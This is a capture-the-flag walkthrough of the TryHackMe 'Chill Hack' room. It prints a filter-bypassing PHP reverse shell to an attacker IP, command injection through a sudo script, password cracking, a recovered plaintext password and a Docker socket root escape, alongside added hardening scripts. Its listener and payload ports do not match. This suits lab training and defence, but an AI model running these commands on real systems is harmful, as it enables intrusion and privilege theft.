Chill Hack (The Easy Way)
Today we will be solving the Chill Hack room on TryHackMe, which is an intermediate-level CTF. Let's join the room and start it.
We begin by scanning the target with nmap.
Command to be used:
sudo nmap -T4 -A ip_address
As we can see from the result, anonymous login is allowed on FTP, so let's try logging in as anonymous.
Command used:
ftp ip_address
Once we are in as anonymous, let's search for any flag or clues.
On searching, we find a note.txt file on the server. Let's download note.txt to our local machine.
Command used to download the file: get note.txt
After downloading note.txt to our local machine, let's look at its content.
From the hint we learn that there are at least two users, Anurodh and Apaar, that there is somewhere to enter commands, and that some filtering is applied to strings.
Now let's search for the place where commands can be entered. There is a good chance that there are hidden directories, so let's use gobuster to enumerate them.
Command used :
gobuster dir -u http://ip_address -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Here we find one interesting directory, /secret.
Let's look into the secret directory and check whether we can find anything useful.
BINGO!!! We find the command page. As mentioned in note.txt, some commands are filtered.
Let's test which commands are filtered and which are not.
Here we get the hacker alert, which means the ls command is filtered, so let's try another command.
The pwd command is not filtered.
Now let's set up a listener on the attacker machine using Netcat.
Command used:
nc -lnvp 4444
Then enter the reverse shell command into the page, quoting part of the command name so that it gets past the filter:
'p'hp -r '$sock=fsockopen("10.9.120.205",1234);exec("/bin/bash -i <&3 >&3 2>&3");'
Now we get a reverse shell on the target.
Once we have the reverse shell, let's check which user we got it as. For this, type whoami.
Here we can see that we are the www-data user.
Now let's start looking for privilege escalation. First, let's check:
sudo -l
Here we can see that the user www-data can run /home/apaar/.helpline.sh as apaar.
Before running .helpline.sh, let's check its content using cat.
Reading the script, we can see that it is vulnerable to command injection, so let's exploit it.
For this we run .helpline.sh as apaar with the following command and answer its prompts as shown:
sudo -u apaar /home/apaar/.helpline.sh
Enter the person whom you want to talk with: hero
Hello user! I am hero, Please enter your message: /bin/bash
Then upgrade the shell to an interactive TTY:
python3 -c 'import pty;pty.spawn("/bin/bash")'
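Both the web command page and .helpline.sh fail in the same way: user input is handed to the shell as a command, and a blacklist of command names is trivially worked around by quoting. The block below is an added example, not the room's script or filter; it shows a constructed stand-in for the vulnerable pattern next to a hardened handler that allowlists characters and writes the message with printf, so the input is never evaluated (the log path is an assumption).

```shell
#!/bin/sh
# Added example, not the room's .helpline.sh or its web filter. A constructed
# stand-in for the vulnerable pattern (user input expanded as a command) next
# to a hardened handler that treats the message strictly as data.

# Vulnerable pattern (constructed): $msg is word-split and executed, so the
# "message" prompt is really a command prompt.
vulnerable_helpline() {
    person="$1"; msg="$2"
    echo "Hello user! I am $person, Please enter your message:"
    $msg 2>/dev/null
}

# Hardened handler: allowlist the characters (no shell metacharacters), cap
# the length, and write the message with printf '%s' so it is never
# evaluated. The log path default is an assumption for the example.
safe_helpline() {
    person="$1"; msg="$2"; logfile="${3:-/tmp/helpline.log}"
    case "$person" in
        ""|*[!A-Za-z0-9._-]*) echo "invalid name" >&2; return 1 ;;
    esac
    if [ "${#msg}" -gt 200 ]; then
        echo "message too long" >&2; return 1
    fi
    case "$msg" in
        ""|*[![:alnum:][:space:].,!?-]*) echo "invalid message" >&2; return 1 ;;
    esac
    printf '%s: %s\n' "$person" "$msg" >> "$logfile"
    echo "Thank you for your time."
}
```

Even the hardened version should not be exposed through sudo without need: the real fix for the room's escalation path is to remove the NOPASSWD rule, since any script run as another user is part of that user's attack surface.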
We successfully escalated our privileges to apaar. Now let's go to apaar's home directory and check for a flag.
cd /home/apaar
Here we can see a local.txt file. Let's check its content.
BINGO!! We successfully got the user flag.
Our next target is root access, so let's search the server for any hints.
First let's check the /var/www directory.
In the files directory inside /var/www we find an interesting file named hacker.php.
Let's check its content.
Here we get the image source: images/hacker-with-laptop_23-2147985341.jpg
Now let's download the image to our local system and check with steghide whether it contains a hidden file.
For this, let's run an HTTP server on the target machine and then fetch the file from our local machine.
Let's download the image file to our local machine using wget.
Once we download the file let's analyze the file using steghide.
command used:
steghide --extract -sf hacker-with-laptop_23-2147985341.jpg
Here we get backup.zip out of the image. Let's try to unzip it.
The zip file is password protected, so let's use zip2john and john to crack the password.
Command to be used:
zip2john backup.zip > input_john.txt
john -w=/usr/share/wordlists/rockyou.txt input_john.txt
To see the cracked password:
john --show input_john.txt
Here we get the password for the zip file which is pass1word.
Now let's unzip the file with the recovered password.
Here source_code.php is extracted. Let's check the content of the file.
Here we find a base64-encoded string in the if condition, and from the code we can guess that it is Anurodh's encoded password. Let's decode the base64 using an online decoder.
Upon decoding, we get to know the password which is: !d0ntKn0wmYp@ssw0rd
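A hardcoded base64 credential in source is exactly what a code review or secret scan should catch, and decoding it locally avoids pasting a live password into a third-party website. The block below is an added example, not the room's source_code.php or any existing tool: it scans a PHP file for quoted base64-looking literals and decodes them offline with GNU base64 (the sample file and its value are constructed).

```shell
#!/bin/sh
# Added example, not the room's source_code.php or any project tool. Scans a
# PHP file for quoted base64-looking literals and decodes them offline with
# GNU base64, so a hardcoded credential never has to be pasted into an
# online decoder. Prints "line:decoded" for every hit that decodes to
# printable ASCII.
find_b64_literals() {
    file="$1"
    grep -noE "['\"][A-Za-z0-9+/]{16,}={0,2}['\"]" "$file" |
    while IFS=: read -r line lit; do
        lit="${lit#?}"; lit="${lit%?}"            # strip the quotes
        dec=$(printf '%s' "$lit" | base64 -d 2>/dev/null) || continue
        # Skip hits that decode to binary or multi-line data.
        if printf '%s' "$dec" | LC_ALL=C grep -q '[^ -~]'; then
            continue
        fi
        printf '%s:%s\n' "$line" "$dec"
    done
}
```

Run it as find_b64_literals source_code.php; a hit means the credential belongs in a secrets store, and the password should be rotated since it has been committed.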
Now let's try to connect over SSH as anurodh.
We successfully gained access as anurodh. Now let's download linpeas.sh to the target from our local machine using wget and run it to look for privilege escalation paths.
Command to be used :
chmod +x linpeas.sh
./linpeas.sh
Here we can see that /var/run/docker.sock is writable, with a link. Let's visit the link and search for docker on the page.
Now let's run the docker command mentioned on the page.
Command :
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
When we run the command we get: unable to find ubuntu:latest locally.
So let's replace ubuntu with a docker image that is present locally.
New command :
docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host /bin/bash
After running the docker command we successfully gain root privileges.
Now let's go to the root directory and check for the flag.
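The root step works because write access to the Docker socket is equivalent to root on the host: whoever can talk to the daemon can start a container that mounts / and chroots into it, exactly as above. The block below is an added example, not from the room or linpeas; it is a small audit function for a hardening script that reports whether a socket path is writable by the current user (the path argument defaults to /var/run/docker.sock).

```shell
#!/bin/sh
# Added example, not from the room or linpeas. Audits a Docker socket path:
# anyone who can write to it can start a privileged container that mounts
# the host filesystem, so write access is equivalent to root. Prints
# ABSENT, WRITABLE or NOT_WRITABLE and returns 2 on a finding, so it can be
# dropped into a hardening or compliance script.
audit_docker_socket() {
    sock="${1:-/var/run/docker.sock}"
    if [ ! -e "$sock" ]; then
        echo "ABSENT"
        return 0
    fi
    ls -l "$sock" >&2                      # owner, group and mode, for the report
    # Membership in the docker group is the usual reason for write access.
    if id -nG 2>/dev/null | tr ' ' '\n' | grep -qx docker; then
        echo "note: current user is in the docker group" >&2
    fi
    if [ -w "$sock" ]; then
        echo "WRITABLE"
        return 2
    fi
    echo "NOT_WRITABLE"
    return 0
}
```

A WRITABLE result for a non-administrative account means that account is effectively root; the fix is to keep the socket root:docker with mode 660, keep the docker group to administrators only, or move to rootless Docker.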
Command :
cd /root
cat proof.txt
BINGO!!! We get the root flag.
Hence, by the steps above, we obtain both flags.
(NOTE: You can skip the privilege escalation to apaar and perform the root privilege escalation directly to get both flags, but it is good practice to follow the complete steps.)
References:
https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket